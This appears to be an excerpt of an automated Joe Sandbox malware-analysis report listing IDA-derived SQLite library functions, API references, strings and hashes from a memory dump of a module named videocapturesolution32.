                                                          APIs
                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 609255B2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 1465156292-0
                                                          • Opcode ID: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                          • Instruction ID: 19c4c58ecb434a21204d9b38047e93a23a7f28015e8477a734fda6841bb58fe8
                                                          • Opcode Fuzzy Hash: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                          • Instruction Fuzzy Hash: 56317AB4A082188FCB04DF69D880A8EBBF6FF99314F008559FC5897348D734D940CBA5
                                                          APIs
                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60925769
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 1465156292-0
                                                          • Opcode ID: f78b12b45e858c7fd8cb74f5d211d4e30abbc68d4504511404b73e1b177a8d68
                                                          • Instruction ID: d5dd20366bd30be5098f9e48471fbeb1ccf01997be5a2761bb4486817e6b3aba
                                                          • Opcode Fuzzy Hash: f78b12b45e858c7fd8cb74f5d211d4e30abbc68d4504511404b73e1b177a8d68
                                                          • Instruction Fuzzy Hash: 23F08171A10A28D7CB106F29EC8958EBBB9FF69254B055058ECC1A730CDB35D925C791
                                                          APIs
                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 1465156292-0
                                                          • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                          • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                          • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                          • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                          APIs
                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 1465156292-0
                                                          • Opcode ID: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                          • Instruction ID: 4fd0dfe8dd6226820e052206e0db6187a6d8a97f2116fb4a305c2fd2856f8961
                                                          • Opcode Fuzzy Hash: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                          • Instruction Fuzzy Hash: 94F08CB5A002099BCB00DF2AD88088ABBBAFF98264B05952AEC049B314D770E941CBD0
                                                          APIs
                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60925678
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 1465156292-0
                                                          • Opcode ID: 20ce1548f611e36a3668a48b9975394e1a388ab84833d9cb320a678b216caf11
                                                          • Instruction ID: bc2fa39936d9f4ed0ba1ebf98b65e017ff83ed2bbf5e058a49948814e7f33c49
                                                          • Opcode Fuzzy Hash: 20ce1548f611e36a3668a48b9975394e1a388ab84833d9cb320a678b216caf11
                                                          • Instruction Fuzzy Hash: 59E0EC74A042089BCB04DF6AD4C194AB7F9EF58258B14D665EC458B309E231E9858BC1
                                                          APIs
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 3064317574-0
                                                          APIs
                                                          • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                            • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                          • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                          • sqlite3_free.SQLITE3 ref: 6096C67E
                                                          • sqlite3_free.SQLITE3 ref: 6096CD71
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                          • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                          • sqlite3_close.SQLITE3 ref: 6096CD97
                                                          • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                          • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                          • API String ID: 1320758876-2501389569
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                          • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                          • API String ID: 937752868-2111127023
                                                          Similarity
                                                          • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc$sqlite3_freesqlite3_vfs_find
                                                          • String ID: @$access$cache
                                                          • API String ID: 4158134138-1361544076
                                                          Strings
                                                          • BEGIN;, xrefs: 609485DB
                                                          • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                          • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                          • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                          • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                          • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                          • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                          • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                          • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                          • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                          • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                          Similarity
                                                          • API ID: sqlite3_log
                                                          • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                          • API String ID: 632333372-52344843
                                                          APIs
                                                            • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                            • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                            • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                            • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                            • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                            • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                            • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                          • sqlite3_malloc.SQLITE3 ref: 60960384
                                                          • sqlite3_free.SQLITE3 ref: 609605EA
                                                          • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                          • sqlite3_free.SQLITE3 ref: 60960618
                                                          • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                          • String ID: offsets
                                                          • API String ID: 463808202-2642679573
                                                          APIs
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                          • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                          Similarity
                                                          • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                          • String ID:
                                                          • API String ID: 2903785150-0
Similarity
• API ID: sqlite3_freesqlite3_malloc
• String ID:
• API String ID: 423083942-0
• Opcode ID: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
• Instruction ID: dba10035f3c017a022ff92dc0406edc4c972eb6647695f7afdbed5011b3e14eb
• Opcode Fuzzy Hash: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
• Instruction Fuzzy Hash: 9112E3B4A15218CFCB18CF98D480A9EBBF6BF98304F24855AD855AB319D774EC42CF90
APIs
• sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
• sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
• sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
• sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
• sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
• sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
• sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
• sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
• sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
• sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
Similarity
• API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
• String ID:
• API String ID: 3556715608-0
• Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
• Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
• Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
• Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
APIs
• sqlite3_malloc.SQLITE3 ref: 6095F645
• sqlite3_exec.SQLITE3 ref: 6095F686
  • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
• sqlite3_free_table.SQLITE3 ref: 6095F6A0
• sqlite3_mprintf.SQLITE3 ref: 6095F6C7
  • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
  • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
• sqlite3_free.SQLITE3 ref: 6095F6B4
  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
• sqlite3_free.SQLITE3 ref: 6095F6D4
• sqlite3_free.SQLITE3 ref: 6095F6ED
• sqlite3_free_table.SQLITE3 ref: 6095F6FF
• sqlite3_realloc.SQLITE3 ref: 6095F71B
• sqlite3_free_table.SQLITE3 ref: 6095F72D
Similarity
• API ID: sqlite3_freesqlite3_free_table$sqlite3_execsqlite3_initializesqlite3_logsqlite3_mallocsqlite3_mprintfsqlite3_mutex_entersqlite3_reallocsqlite3_vmprintf
• String ID:
• API String ID: 1866449048-0
• Opcode ID: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
• Instruction ID: 9ac78cbffd0e0cf27e5d0fdbf17c3a3d034f00011a14f89e76d08e502163788c
• Opcode Fuzzy Hash: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
• Instruction Fuzzy Hash: 8751F1B49467099FDB01DF69D59178EBBF6FF68318F104429E884AB300D379D894CB91
APIs
• sqlite3_finalize.SQLITE3 ref: 609407B4
  • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
  • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
• sqlite3_finalize.SQLITE3 ref: 609407C2
  • Part of subcall function 6094064B: sqlite3_mutex_enter.SQLITE3 ref: 609406A7
• sqlite3_finalize.SQLITE3 ref: 609407D0
• sqlite3_finalize.SQLITE3 ref: 609407DE
• sqlite3_finalize.SQLITE3 ref: 609407EC
• sqlite3_finalize.SQLITE3 ref: 609407FA
• sqlite3_finalize.SQLITE3 ref: 60940808
• sqlite3_finalize.SQLITE3 ref: 60940816
• sqlite3_finalize.SQLITE3 ref: 60940824
• sqlite3_free.SQLITE3 ref: 6094082C
  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
Similarity
• API ID: sqlite3_finalize$sqlite3_logsqlite3_mutex_enter$sqlite3_free
• String ID:
• API String ID: 14011187-0
• Opcode ID: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
• Instruction ID: 14c977e837db455c9c1ce3b69ce7d4e0fb0da6313972e550a4586d0eb1b189ee
• Opcode Fuzzy Hash: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
• Instruction Fuzzy Hash: F7116774504B008BCB50BF78C9C965877E9AFB5308F061978EC8A8F306EB34D4918B15
Strings
Similarity
• API ID:
• String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
• API String ID: 0-780898
• Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
• Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
• Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
• Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
Strings
Similarity
• API ID:
• String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
• API String ID: 0-2604012851
• Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
• Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
• Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
• Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
APIs
Strings
Similarity
• API ID: memcmp$sqlite3_logsqlite3_mutex_try
• String ID: 0$SQLite format 3
• API String ID: 3174206576-3388949527
• Opcode ID: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
• Instruction ID: d3cc03899c2fb96d27ccc41cf7ad58ff30b38a29db2c3208110d6cb2c70dce50
• Opcode Fuzzy Hash: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
• Instruction Fuzzy Hash: A3028BB0A082659BDB09CF68D48178ABBF7FFA5308F148269E8459B345DB74DC85CF81
APIs
• sqlite3_value_text.SQLITE3 ref: 6095F030
• sqlite3_value_text.SQLITE3 ref: 6095F03E
• sqlite3_stricmp.SQLITE3 ref: 6095F0B3
• sqlite3_free.SQLITE3 ref: 6095F180
  • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
  • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
• sqlite3_free.SQLITE3 ref: 6095F1BD
  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
• sqlite3_result_error_code.SQLITE3 ref: 6095F34E
Strings
Similarity
• API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
• String ID: |
• API String ID: 1576672187-2343686810
• Opcode ID: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
• Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
• Opcode Fuzzy Hash: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
• Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
APIs
• sqlite3_file_control.SQLITE3 ref: 609537BD
• sqlite3_free.SQLITE3 ref: 60953842
• sqlite3_free.SQLITE3 ref: 6095387C
  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
• sqlite3_stricmp.SQLITE3 ref: 609538D4
Strings
Similarity
• API ID: sqlite3_free$sqlite3_file_controlsqlite3_mutex_entersqlite3_stricmp
• String ID: 6$timeout
• API String ID: 2671017102-3660802998
• Opcode ID: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
• Instruction ID: da3e9078838fdf1f068eeacc94130b5fe058058c2a53432068b0843c8cdd1fdd
• Opcode Fuzzy Hash: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
• Instruction Fuzzy Hash: 6CA11270A083198BDB15CF6AC88079EBBF6BFA9304F10846DE8589B354D774D885CF41
APIs
• sqlite3_snprintf.SQLITE3 ref: 6095D450
  • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
• sqlite3_snprintf.SQLITE3 ref: 6095D4A1
• sqlite3_snprintf.SQLITE3 ref: 6095D525
Strings
Similarity
• API ID: sqlite3_snprintf$sqlite3_vsnprintf
• String ID: $)><$sqlite_master$sqlite_temp_master
• API String ID: 652164897-1572359634
• Opcode ID: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
• Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
• Opcode Fuzzy Hash: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
• Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
APIs
• sqlite3_value_text.SQLITE3 ref: 6091B06E
• sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
• sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
• sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                          • String ID:
                                                          • API String ID: 2352520524-0
                                                          • Opcode ID: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                          • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                          • Opcode Fuzzy Hash: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                          • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                          APIs
                                                            • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                            • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                            • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                          • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                            • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                          • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                            • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                            • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                            • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                          • sqlite3_exec.SQLITE3 ref: 6096A523
                                                          • sqlite3_exec.SQLITE3 ref: 6096A554
                                                          • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                          • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
